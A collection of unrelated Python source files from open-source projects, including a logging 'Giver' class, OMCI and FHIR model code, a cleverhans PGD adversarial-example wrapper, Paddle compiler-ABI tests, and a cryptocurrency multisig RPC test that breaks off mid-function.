special:
List of special keys to give (e.g. "$line", "$time", etc.)
extra:
Extra key/value pairs to give.
context:
The ContextVar that contains a list of handlers to call
when something is given.
inherited:
A ContextVar to use for inherited key/value pairs to give,
as set by ``with self.inherit(key=value): ...``.
transform:
A function from dict to dict that modifies the values to
give.
"""
def __init__(
self,
*,
keys=None,
special=[],
extra={},
context=global_context,
inherited=global_inherited,
transform=None,
):
self.keys = keys
self.special = special
self.extra = extra
self.context = context
self.inherited = inherited
self.transform = transform
def copy(
self,
keys=None,
special=None,
extra=None,
context=None,
inherited=None,
transform=None,
):
"""Copy this Giver with modified parameters."""
return type(self)(
keys=self.keys if keys is None else keys,
special=self.special if special is None else special,
extra=self.extra if extra is None else extra,
context=self.context if context is None else context,
inherited=self.inherited if inherited is None else inherited,
transform=self.transform if transform is None else transform,
)
@property
def line(self):
"""Return a giver that gives the line where it is called."""
return self.copy(special=(*self.special, "$line"))
@property
def time(self):
"""Return a giver that gives the time where it is called."""
return self.copy(special=(*self.special, "$time"))
@contextmanager
def inherit(self, **keys):
"""Create a context manager within which extra values are given.
.. code-block:: python
with give.inherit(a=1):
give(b=2) # gives {"a": 1, "b": 2}
Arguments:
keys: The key/value pairs to give within the block.
"""
inh = self.inherited.get()
token = self.inherited.set({**inh, **keys})
try:
yield
finally:
self.inherited.reset(token)
@contextmanager
def wrap(self, name, **keys):
"""Create a context manager that marks the beginning/end of the block.
``wrap`` first creates a unique ID to identify the block,
then gives the ``$wrap`` sentinel with name, uid and step="begin"
at the beginning of it gives the same ``$wrap`` but with step="end"
at the end of the block.
:meth:`giving.gvn.ObservableProxy.wrap` is the corresponding
method on the ObservableProxy returned by ``given()`` and it
can be used to wrap another context manager on the same block.
:meth:`giving.gvn.ObservableProxy.group_wrap` is another method
that uses the sentinels produced by ``wrap``.
.. code-block:: python
with give.wrap("W", x=1): # gives: {"$wrap": {"name": "W", "step": "begin", "id": ID}, "x": 1}
...
# end block, gives: {"$wrap": {"name": "W", "step": "end", "id": ID}, "x": 1}
Arguments:
name: The name to associate to this wrap block.
keys: Extra key/value pairs to give along with the sentinels.
"""
num = next(global_count)
self.produce({"$wrap": {"name": name, "step": "begin", "id": num}, **keys})
try:
yield
finally:
self.produce({"$wrap": {"name": name, "step": "end", "id": num}, **keys})
@contextmanager
def wrap_inherit(self, name, **keys):
"""Shorthand for using wrap and inherit.
.. code-block:: python
with give.wrap_inherit("W", a=1):
...
Is equivalent to:
.. code-block:: python
with give.inherit(a=1):
with give.wrap("W"):
...
Arguments:
name: The name to associate to this wrap block.
keys: Key/value pairs to inherit.
"""
with self.inherit(**keys):
with self.wrap(name):
yield
def produce(self, values):
"""Give the values dictionary."""
for special in self.special:
values[special] = special_keys[special]()
if self.extra:
values = {**self.extra, **values}
inh = self.inherited.get()
if inh is not None:
values = {**inh, **values}
for handler in self.context.get():
handler(values)
def variant(self, fn):
"""Create a version of give that transforms the data.
.. code-block:: python
@give.variant
def give_image(data):
return {"image": data}
...
give_image(x, y) # gives {"image": {"x": x, "y": y}}
Arguments:
fn: A function from a dict to a dict.
give: The base give function to wrap (defaults to global give).
"""
return self.copy(transform=fn)
def __call__(self, *args, **values):
"""Give the args and values."""
h = self.context.get()
if h:
if self.keys:
if len(args) != len(self.keys):
raise ImproperUseError(
f"Giver for {self.keys} must have {len(self.keys)} positional argument(s)."
)
keyed = dict(zip(self.keys, args))
values = {**keyed, **values}
elif args:
values = {**resolve(1, self, args), **values}
elif not values:
values = resolve(1, self, ())
if self.transform:
values = self.transform(values)
self.produce(values)
if len(args) == 1:
return args[0]
else:
return None
def giver(*keys, **extra):
"""Create a Giver to give the specified keys, plus extra values.
.. code-block:: python
g = giver("x", y=1)
give(3) # gives {"x": 3, "y": 1}
"""
normal = [k for k in keys if not k.startswith("$")]
special = [k for k in keys if k.startswith("$")]
return Giver(keys=normal, special=special, extra=extra)
|
the-stack_0_3759 | #
# Copyright 2018 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
from hashlib import md5
from unittest import TestCase, main
from nose.tools import raises
from nose.twistedtools import deferred
from copy import deepcopy
from .mock.mock_adapter_agent import MockAdapterAgent, MockCore
from .mock.mock_onu_handler import MockOnuHandler
from .mock.mock_olt_handler import MockOltHandler
from .mock.mock_onu import MockOnu
from pyvoltha.adapters.extensions.omci.openomci_agent import OpenOMCIAgent, OpenOmciAgentDefaults
from pyvoltha.adapters.extensions.omci.onu_configuration import OMCCVersion
from pyvoltha.adapters.extensions.omci.omci_defs import *
from pyvoltha.adapters.extensions.omci.omci_entities import OntG, Ont2G, Cardholder, \
CircuitPack, SoftwareImage, AniG, UniG
from pyvoltha.common.utils.asleep import asleep
from pyvoltha.adapters.extensions.omci.database.mib_db_dict import MibDbVolatileDict
from datetime import datetime
DEFAULT_OLT_DEVICE_ID = 'default_olt_mock'
DEFAULT_ONU_DEVICE_ID = 'default_onu_mock'
DEFAULT_PON_ID = 0
DEFAULT_ONU_ID = 0
DEFAULT_ONU_SN = 'TEST00000001'
OP = EntityOperations
RC = ReasonCodes
class TestOmciConfiguration(TestCase):
"""
Test the OMCI read-only Configuration library methods
"""
def setUp(self):
self.adapter_agent = MockAdapterAgent()
custom = deepcopy(OpenOmciAgentDefaults)
custom['mib-synchronizer']['database'] = MibDbVolatileDict
self.omci_agent = OpenOMCIAgent(MockCore, support_classes=custom)
self.omci_agent.start()
def tearDown(self):
if self.omci_agent is not None:
self.omci_agent.stop()
if self.adapter_agent is not None:
self.adapter_agent.tearDown()
def setup_mock_olt(self, device_id=DEFAULT_OLT_DEVICE_ID):
handler = MockOltHandler(self.adapter_agent, device_id)
self.adapter_agent.add_device(handler.device)
return handler
def setup_mock_onu(self, parent_id=DEFAULT_OLT_DEVICE_ID,
device_id=DEFAULT_ONU_DEVICE_ID,
pon_id=DEFAULT_PON_ID,
onu_id=DEFAULT_ONU_ID,
serial_no=DEFAULT_ONU_SN):
handler = MockOnuHandler(self.adapter_agent, parent_id, device_id, pon_id, onu_id)
handler.serial_number = serial_no
onu = MockOnu(serial_no, self.adapter_agent, handler.device_id) \
if serial_no is not None else None
handler.onu_mock = onu
return handler
def setup_one_of_each(self):
# Most tests will use at lease one or more OLT and ONU
self.olt_handler = self.setup_mock_olt()
self.onu_handler = self.setup_mock_onu(parent_id=self.olt_handler.device_id)
self.onu_device = self.onu_handler.onu_mock
self.adapter_agent.add_child_device(self.olt_handler.device,
self.onu_handler.device)
# Add device to OpenOMCI
self.onu_device = self.omci_agent.add_device(DEFAULT_ONU_DEVICE_ID,
self.adapter_agent)
# Allow timeout trigger support while in disabled state for mib sync
# to make tests run cleanly while profiling.
self.onu_device.mib_synchronizer.machine.add_transition('timeout', 'disabled', 'disabled')
def not_called(self, _reason):
assert False, 'Should never be called'
def _stuff_database(self, entries):
"""
Stuff the MIB database with some entries that we will use during tests
"""
database = self.onu_device.mib_synchronizer._database
# Stuff a value into last in sync. This makes it look like
# the ONU has been in in-sync at least once.
self.onu_device.mib_synchronizer.last_mib_db_sync = datetime.utcnow()
# Entry is a tuple of (class_id, instance_id, {attributes})
for entry in entries:
database.set(DEFAULT_ONU_DEVICE_ID, entry[0], entry[1], entry[2])
def test_OMCCVersion(self):
for key, value in OMCCVersion.__members__.items():
self.assertEqual(OMCCVersion.to_enum(OMCCVersion[key].value), value)
self.assertEqual(OMCCVersion.to_enum(-1), OMCCVersion.Unknown)
@deferred(timeout=50000)
def test_defaults(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
@raises(AssertionError)
def do_my_tests(_results):
config = self.onu_device.configuration
# Should raise assertion if never been synchronized
config.version
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs. This is a waiting
# Async task from when the OpenOMCIAgent was started. But also start the
# device so that it's queued async state machines can run as well
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_but_empty(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
def stuff_db(_results):
self._stuff_database([])
def do_my_tests(_results):
config = self.onu_device.configuration
# On no Class ID for requested property, None should be
# returned
self.assertIsNone(config.version)
self.assertIsNone(config.traffic_management_option)
self.assertIsNone(config.onu_survival_time)
self.assertIsNone(config.equipment_id)
self.assertIsNone(config.omcc_version)
self.assertIsNone(config.vendor_product_code)
self.assertIsNone(config.total_priority_queues)
self.assertIsNone(config.total_traffic_schedulers)
self.assertIsNone(config.total_gem_ports)
self.assertIsNone(config.uptime)
self.assertIsNone(config.connectivity_capability)
self.assertIsNone(config.qos_configuration_flexibility)
self.assertIsNone(config.priority_queue_scale_factor)
self.assertIsNone(config.cardholder_entities)
self.assertIsNone(config.circuitpack_entities)
self.assertIsNone(config.software_images)
self.assertIsNone(config.ani_g_entities)
self.assertIsNone(config.uni_g_entities)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_ont_g_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
version = 'abcDEF'
tm_opt = 2
onu_survival = 123
def stuff_db(_results):
self._stuff_database([
(OntG.class_id, 0, {'version': version,
'traffic_management_options': tm_opt,
'ont_survival_time': onu_survival
})])
def do_my_tests(_results):
config = self.onu_device.configuration
# On no Class ID for requested property, None should be
# returned
self.assertEqual(config.version, version)
self.assertEqual(config.traffic_management_option, tm_opt)
self.assertEqual(config.onu_survival_time, onu_survival)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_ont_2g_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
equip_id = 'br-549'
omcc_ver = OMCCVersion.G_988_2012
vend_code = 0x1234
queues = 64
scheds = 8
gem_ports = 24
uptime = 12345
conn_capp = 0x00aa
qos_flex = 0x001b
queue_scale = 1
def stuff_db(_results):
self._stuff_database([
(Ont2G.class_id, 0, {'equipment_id': equip_id,
'omcc_version': omcc_ver.value,
'vendor_product_code': vend_code,
'total_priority_queue_number': queues,
'total_traffic_scheduler_number': scheds,
'total_gem_port_id_number': gem_ports,
'sys_uptime': uptime,
'connectivity_capability': conn_capp,
'qos_configuration_flexibility': qos_flex,
'priority_queue_scale_factor': queue_scale
})])
def do_my_tests(_results):
config = self.onu_device.configuration
self.assertEqual(config.equipment_id, equip_id)
self.assertEqual(config.omcc_version, omcc_ver)
self.assertEqual(config.vendor_product_code, vend_code)
self.assertEqual(config.total_priority_queues, queues)
self.assertEqual(config.total_traffic_schedulers, scheds)
self.assertEqual(config.total_gem_ports, gem_ports)
self.assertEqual(config.uptime, uptime)
self.assertEqual(config.connectivity_capability, conn_capp)
self.assertEqual(config.qos_configuration_flexibility, qos_flex)
self.assertEqual(config.priority_queue_scale_factor, queue_scale)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_cardholder_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
ch_entity = 0x102
unit_type = 255
clie_code = 'abc123'
prot_ptr = 0
def stuff_db(_results):
self._stuff_database([
(Cardholder.class_id, ch_entity, {'actual_plugin_unit_type': unit_type,
'actual_equipment_id': clie_code,
'protection_profile_pointer': prot_ptr,
})])
def do_my_tests(_results):
config = self.onu_device.configuration
cardholder = config.cardholder_entities
self.assertTrue(isinstance(cardholder, dict))
self.assertEqual(len(cardholder), 1)
self.assertEqual(cardholder[ch_entity]['entity-id'], ch_entity)
self.assertEqual(cardholder[ch_entity]['is-single-piece'], ch_entity >= 256)
self.assertEqual(cardholder[ch_entity]['slot-number'], ch_entity & 0xFF)
self.assertEqual(cardholder[ch_entity]['actual-plug-in-type'], unit_type)
self.assertEqual(cardholder[ch_entity]['actual-equipment-id'], clie_code)
self.assertEqual(cardholder[ch_entity]['protection-profile-ptr'], prot_ptr)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_circuitpack_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
cp_entity = 0x100
num_ports = 1
serial_num = 'ABCD01234'
cp_version = '1234ABCD'
vendor_id = 'AB-9876'
tconts = 2
pqueues = 64
sched_count = 8
def stuff_db(_results):
self._stuff_database([
(CircuitPack.class_id, cp_entity, {'number_of_ports': num_ports,
'serial_number': serial_num,
'version': cp_version,
'vendor_id': vendor_id,
'total_tcont_buffer_number': tconts,
'total_priority_queue_number': pqueues,
'total_traffic_scheduler_number': sched_count,
})])
def do_my_tests(_results):
config = self.onu_device.configuration
circuitpack = config.circuitpack_entities
self.assertTrue(isinstance(circuitpack, dict))
self.assertEqual(len(circuitpack), 1)
self.assertEqual(circuitpack[cp_entity]['entity-id'], cp_entity)
self.assertEqual(circuitpack[cp_entity]['number-of-ports'], num_ports)
self.assertEqual(circuitpack[cp_entity]['serial-number'], serial_num)
self.assertEqual(circuitpack[cp_entity]['version'], cp_version)
self.assertEqual(circuitpack[cp_entity]['vendor-id'], vendor_id)
self.assertEqual(circuitpack[cp_entity]['total-tcont-count'], tconts)
self.assertEqual(circuitpack[cp_entity]['total-priority-queue-count'], pqueues)
self.assertEqual(circuitpack[cp_entity]['total-traffic-sched-count'], sched_count)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_software_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
sw_entity = 0x200
sw_version = 'Beta-0.0.2'
sw_hash = md5("just_a_test").hexdigest()
prod_code = 'MySoftware'
sw_active = True
sw_committed = True
sw_valid = True
def stuff_db(_results):
self._stuff_database([
(SoftwareImage.class_id, sw_entity, {'version': sw_version,
'is_committed': sw_committed,
'is_active': sw_active,
'is_valid': sw_valid,
'product_code': prod_code,
'image_hash': sw_hash,
})])
def do_my_tests(_results):
config = self.onu_device.configuration
images = config.software_images
self.assertTrue(isinstance(images, list))
self.assertEqual(len(images), 1)
self.assertEqual(images[0].name, 'running-revision' if sw_active else 'candidate-revision')
self.assertEqual(images[0].version, sw_version)
self.assertEqual(images[0].is_active, 1 if sw_active else 0)
self.assertEqual(images[0].is_committed, 1 if sw_committed else 0)
self.assertEqual(images[0].is_valid, 1 if sw_valid else 0)
self.assertEqual(images[0].hash, sw_hash)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_ani_g_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
entity_id = 0x0106
tconts = 4
dba_report = 4
def stuff_db(_results):
self._stuff_database([
(AniG.class_id, entity_id, {'total_tcont_number': tconts,
'piggyback_dba_reporting': dba_report
})
])
def do_my_tests(_results):
config = self.onu_device.configuration
anig = config.ani_g_entities
self.assertTrue(isinstance(anig, dict))
self.assertEqual(len(anig), 1)
self.assertEqual(anig[entity_id]['entity-id'], entity_id)
self.assertEqual(anig[entity_id]['slot-number'], (entity_id >> 8) & 0xff)
self.assertEqual(anig[entity_id]['port-number'], entity_id & 0xff)
self.assertEqual(anig[entity_id]['total-tcont-count'], tconts)
self.assertEqual(anig[entity_id]['piggyback-dba-reporting'], dba_report)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_uni_g_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
entity_id = 0x4321
mgmt_cap = 0
def stuff_db(_results):
self._stuff_database([
(UniG.class_id, entity_id, {'management_capability': mgmt_cap})
])
def do_my_tests(_results):
config = self.onu_device.configuration
unig = config.uni_g_entities
self.assertTrue(isinstance(unig, dict))
self.assertEqual(len(unig), 1)
self.assertEqual(unig[entity_id]['entity-id'], entity_id)
self.assertEqual(unig[entity_id]['management-capability'], mgmt_cap)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
if __name__ == '__main__':
main()
|
the-stack_0_3762 | # -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/ContactPoint
Release: STU3
Version: 3.0.2
Revision: 11917
Last updated: 2019-10-24T11:53:00+11:00
"""
from pydantic import Field
from . import element, fhirtypes
class ContactPoint(element.Element):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Details of a Technology mediated contact point (phone, fax, email, etc.).
Details for all kinds of technology mediated contact points for a person or
organization, including telephone, email, etc.
"""
resource_type = Field("ContactPoint", const=True)
period: fhirtypes.PeriodType = Field(
None,
alias="period",
title="Time period when the contact point was/is in use",
description=None,
# if property is element of this resource.
element_property=True,
)
rank: fhirtypes.PositiveInt = Field(
None,
alias="rank",
title="Specify preferred order of use (1 = highest)",
description=(
"Specifies a preferred order in which to use a set of contacts. "
"Contacts are ranked with lower values coming before higher values."
),
# if property is element of this resource.
element_property=True,
)
rank__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_rank", title="Extension field for ``rank``."
)
system: fhirtypes.Code = Field(
None,
alias="system",
title="phone | fax | email | pager | url | sms | other",
description=(
"Telecommunications form for contact point - what communications system"
" is required to make use of the contact."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["phone", "fax", "email", "pager", "url", "sms", "other"],
)
system__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_system", title="Extension field for ``system``."
)
use: fhirtypes.Code = Field(
None,
alias="use",
title="home | work | temp | old | mobile - purpose of this contact point",
description="Identifies the purpose for the contact point.",
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["home", "work", "temp", "old", "mobile"],
)
use__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_use", title="Extension field for ``use``."
)
value: fhirtypes.String = Field(
None,
alias="value",
title="The actual contact point details",
description=(
"The actual contact point details, in a form that is meaningful to the "
"designated communication system (i.e. phone number or email address)."
),
# if property is element of this resource.
element_property=True,
)
value__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_value", title="Extension field for ``value``."
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``ContactPoint`` according specification,
with preserving original sequence order.
"""
return ["id", "extension", "system", "value", "use", "rank", "period"]
|
the-stack_0_3767 | import numpy as np
from cleverhans.attacks import ProjectedGradientDescent
from tools.cleverhans.adversarial_attack import AdversarialAttack
class PGDAttack(AdversarialAttack):
def __init__(self, model, targeted=False, step_size_iter=0.05, max_perturbation=0.3, n_iterations=10,
norm_order=np.inf, rand_init=None, rand_minmax=0.3, clip_min=None, clip_max=None, sanity_checks=True):
super().__init__(model=model, clip_min=clip_min, clip_max=clip_max)
self._targeted = targeted
self._step_size_iter = step_size_iter
self._max_perturbation = max_perturbation
self._n_iterations = n_iterations
self._norm_order = norm_order
self._rand_init = rand_init
self._rand_minmax = rand_minmax
self._sanity_checks = sanity_checks
with self.graph.as_default():
self._method = ProjectedGradientDescent(self._model, sess=self.session, eps=self._max_perturbation,
eps_iter=self._step_size_iter, nb_iter=self._n_iterations,
ord=self._norm_order, rand_init=self._rand_init,
clip_min=self._clip_min, clip_max=self._clip_max,
sanity_checks=self._sanity_checks)
def attack_method(self, labels):
if labels is not None:
if self._targeted:
return self._method.generate(x=self._x_clean, y_target=labels, rand_minmax=self._rand_minmax)
else:
return self._method.generate(x=self._x_clean, y=labels, rand_minmax=self._rand_minmax)
return self._method.generate(x=self._x_clean, rand_minmax=self._rand_minmax)
|
the-stack_0_3768 | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import paddle
import os
import warnings
import paddle.utils.cpp_extension.extension_utils as utils
class TestABIBase(unittest.TestCase):
def test_environ(self):
compiler_list = ['gcc', 'cl']
for compiler in compiler_list:
for flag in ['1', 'True', 'true']:
os.environ['PADDLE_SKIP_CHECK_ABI'] = flag
self.assertTrue(utils.check_abi_compatibility(compiler))
def del_environ(self):
key = 'PADDLE_SKIP_CHECK_ABI'
if key in os.environ:
del os.environ[key]
class TestCheckCompiler(TestABIBase):
def test_expected_compiler(self):
if utils.OS_NAME.startswith('linux'):
gt = ['gcc', 'g++', 'gnu-c++', 'gnu-cc']
elif utils.IS_WINDOWS:
gt = ['cl']
elif utils.OS_NAME.startswith('darwin'):
gt = ['clang', 'clang++']
self.assertListEqual(utils._expected_compiler_current_platform(), gt)
def test_compiler_version(self):
# clear environ
self.del_environ()
if utils.OS_NAME.startswith('linux'):
compiler = 'g++'
elif utils.IS_WINDOWS:
compiler = 'cl'
# Linux: all CI gcc version > 5.4.0
# Windows: all CI MSVC version > 19.00.24215
# Mac: clang has no version limitation, always return true
self.assertTrue(utils.check_abi_compatibility(compiler, verbose=True))
def test_wrong_compiler_warning(self):
# clear environ
self.del_environ()
compiler = 'python' # fake wrong compiler
with warnings.catch_warnings(record=True) as error:
flag = utils.check_abi_compatibility(compiler, verbose=True)
# check return False
self.assertFalse(flag)
# check Compiler Compatibility WARNING
self.assertTrue(len(error) == 1)
self.assertTrue(
"Compiler Compatibility WARNING" in str(error[0].message))
def test_exception(self):
# clear environ
self.del_environ()
compiler = 'python' # fake command
if utils.OS_NAME.startswith('linux'):
def fake():
return [compiler]
# mock a fake function
raw_func = utils._expected_compiler_current_platform
utils._expected_compiler_current_platform = fake
with warnings.catch_warnings(record=True) as error:
flag = utils.check_abi_compatibility(compiler, verbose=True)
# check return False
self.assertFalse(flag)
# check ABI Compatibility WARNING
self.assertTrue(len(error) == 1)
self.assertTrue("Failed to check compiler version for" in
str(error[0].message))
# restore
utils._expected_compiler_current_platform = raw_func
class TestJITCompilerException(unittest.TestCase):
def test_exception(self):
with self.assertRaisesRegexp(RuntimeError,
"Failed to check Python interpreter"):
file_path = os.path.abspath(__file__)
utils._jit_compile(file_path, interpreter='fake_cmd', verbose=True)
class TestRunCMDException(unittest.TestCase):
def test_exception(self):
for verbose in [True, False]:
with self.assertRaisesRegexp(RuntimeError, "Failed to run command"):
cmd = "fake cmd"
utils.run_cmd(cmd, verbose)
if __name__ == '__main__':
unittest.main()
|
the-stack_0_3769 |
def melt(df):
"""Melt a census dataframe into two value columns, for the estimate and margin"""
import pandas as pd
# Intial melt
melted = pd.melt(df, id_vars=list(df.columns[:9]), value_vars=list(df.columns[9:]))
melted = melted[['gvid', 'variable', 'value']]
# Make two seperate frames for estimates and margins.
estimates = melted[~melted.variable.str.contains('_m90')].set_index(['gvid', 'variable'])
margins = melted[melted.variable.str.contains('_m90')].copy()
margins.columns = ['gvid', 'ovariable', 'm90']
margins['variable'] = margins.ovariable.str.replace('_m90', '')
# Join the estimates to the margins.
final = estimates.join(margins.set_index(['gvid', 'variable']).drop('ovariable', 1))
return final
# From http://stackoverflow.com/a/295466
def slugify(value):
"""
Normalizes string, converts to lowercase, removes non-alpha characters,
and converts spaces to hyphens.type(
"""
import re
import unicodedata
from six import text_type
value = text_type(value)
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore').decode('utf8')
value = re.sub(r'[^\w\s-]', '-', value).strip().lower()
value = re.sub(r'[-\s]+', '-', value)
return value
CACHE_NAME = 'pandasreporter'
def nl2br(v, is_xhtml= True ):
if is_xhtml:
return v.replace('\n','<br />\n')
else :
return v.replace('\n','<br>\n') |
the-stack_0_3770 | #!/usr/bin/env python3
# Copyright (c) 2015-2020 The Beans Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multisig RPCs"""
import binascii
import decimal
import itertools
import json
import os
from test_framework.authproxy import JSONRPCException
from test_framework.descriptors import descsum_create, drop_origins
from test_framework.key import ECPubKey, ECKey
from test_framework.test_framework import BeansTestFramework
from test_framework.util import (
assert_raises_rpc_error,
assert_equal,
)
from test_framework.wallet_util import bytes_to_wif
class RpcCreateMultiSigTest(BeansTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.supports_cli = False
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def get_keys(self):
self.pub = []
self.priv = []
node0, node1, node2 = self.nodes
for _ in range(self.nkeys):
k = ECKey()
k.generate()
self.pub.append(k.get_pubkey().get_bytes().hex())
self.priv.append(bytes_to_wif(k.get_bytes(), k.is_compressed))
self.final = node2.getnewaddress()
def run_test(self):
node0, node1, node2 = self.nodes
self.check_addmultisigaddress_errors()
self.log.info('Generating blocks ...')
node0.generate(149)
self.sync_all()
self.moved = 0
for self.nkeys in [3, 5]:
for self.nsigs in [2, 3]:
for self.output_type in ["bech32", "p2sh-segwit", "legacy"]:
self.get_keys()
self.do_multisig()
self.checkbalances()
# Test mixed compressed and uncompressed pubkeys
self.log.info('Mixed compressed and uncompressed multisigs are not allowed')
pk0 = node0.getaddressinfo(node0.getnewaddress())['pubkey']
pk1 = node1.getaddressinfo(node1.getnewaddress())['pubkey']
pk2 = node2.getaddressinfo(node2.getnewaddress())['pubkey']
# decompress pk2
pk_obj = ECPubKey()
pk_obj.set(binascii.unhexlify(pk2))
pk_obj.compressed = False
pk2 = binascii.hexlify(pk_obj.get_bytes()).decode()
node0.createwallet(wallet_name='wmulti0', disable_private_keys=True)
wmulti0 = node0.get_wallet_rpc('wmulti0')
# Check all permutations of keys because order matters apparently
for keys in itertools.permutations([pk0, pk1, pk2]):
# Results should be the same as this legacy one
legacy_addr = node0.createmultisig(2, keys, 'legacy')['address']
assert_equal(legacy_addr, wmulti0.addmultisigaddress(2, keys, '', 'legacy')['address'])
# Generate addresses with the segwit types. These should all make legacy addresses
assert_equal(legacy_addr, wmulti0.createmultisig(2, keys, 'bech32')['address'])
assert_equal(legacy_addr, wmulti0.createmultisig(2, keys, 'p2sh-segwit')['address'])
assert_equal(legacy_addr, wmulti0.addmultisigaddress(2, keys, '', 'bech32')['address'])
assert_equal(legacy_addr, wmulti0.addmultisigaddress(2, keys, '', 'p2sh-segwit')['address'])
self.log.info('Testing sortedmulti descriptors with BIP 67 test vectors')
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/rpc_bip67.json'), encoding='utf-8') as f:
vectors = json.load(f)
for t in vectors:
key_str = ','.join(t['keys'])
desc = descsum_create('sh(sortedmulti(2,{}))'.format(key_str))
assert_equal(self.nodes[0].deriveaddresses(desc)[0], t['address'])
sorted_key_str = ','.join(t['sorted_keys'])
sorted_key_desc = descsum_create('sh(multi(2,{}))'.format(sorted_key_str))
assert_equal(self.nodes[0].deriveaddresses(sorted_key_desc)[0], t['address'])
def check_addmultisigaddress_errors(self):
if self.options.descriptors:
return
self.log.info('Check that addmultisigaddress fails when the private keys are missing')
addresses = [self.nodes[1].getnewaddress(address_type='legacy') for _ in range(2)]
assert_raises_rpc_error(-5, 'no full public key for address', lambda: self.nodes[0].addmultisigaddress(nrequired=1, keys=addresses))
for a in addresses:
# Importing all addresses should not change the result
self.nodes[0].importaddress(a)
assert_raises_rpc_error(-5, 'no full public key for address', lambda: self.nodes[0].addmultisigaddress(nrequired=1, keys=addresses))
def checkbalances(self):
node0, node1, node2 = self.nodes
node0.generate(100)
self.sync_all()
bal0 = node0.getbalance()
bal1 = node1.getbalance()
bal2 = node2.getbalance()
height = node0.getblockchaininfo()["blocks"]
assert 150 < height < 350
total = 149 * 50 + (height - 149 - 100) * 25
assert bal1 == 0
assert bal2 == self.moved
assert bal0 + bal1 + bal2 == total
def do_multisig(self):
node0, node1, node2 = self.nodes
